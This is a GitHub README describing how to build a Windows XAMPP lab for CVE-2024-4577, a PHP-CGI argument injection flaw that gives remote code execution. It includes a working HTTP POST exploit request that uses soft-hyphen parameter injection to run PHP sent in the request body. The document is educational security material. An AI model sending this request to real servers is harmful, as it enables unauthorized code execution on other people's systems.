Skip to content

AlperenY-cs/CVE-2024-4577

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-4577 - PHP-CGI Argument Injection RCE
CVE Description CVSSv3
CVE-2024-4577 PHP-CGI Argument Injection Vulnerability 9.8

"CVE-2024-4577 is a critical argument injection vulnerability in PHP that can be exploited to achieve remote code execution (RCE). According to researchers at DEVCORE, this flaw is the result of errors in character encoding conversions, affecting the “Best Fit” feature on Windows."
-Tenable

Create lab for CVE-2024-4577

Download XAMPP

Download XAMPP (8.1.25 / PHP 8.1.25) After installing XAMPP, check the php version. It should be 8.1.25. The php version can be checked by running the "php -v" command from the command line. If it gives an error, it should be added to the php PATH variable.

Set Locale

The locale needs to change. To do this, follow Control Panel > Clock and Region > Region. Set the format to Japanese, Traditional Chinese, or Simplified Chinese. Click on Administrative > Change system locale and select the appropriate locale.

Configuring Apache

If PHP does not run in cgi mode, you should make these settings.

  • Copy php.exe or php-cgi.exe to /cgi/bin/ folder.
  • Add this lines to \xampp\apache\conf\httpd.conf ⬇️
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Go httpd-xampp.conf and find LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Put '#' to the begining of the line.

Start Apache

Save changes and start apache instance.

Exploitation

If the output of the PHP code sent in the body of the POST request below is seen in the response, the exploitation step is successful.

POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

Disclaimer⚠️

This laboratory environment is intended solely for educational purposes and should not be used in live environments. I am not responsible for any damages or losses that may occur as a result of improper use. Users must utilize this environment at their own risk.

About

Create lab for CVE-2024-4577

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published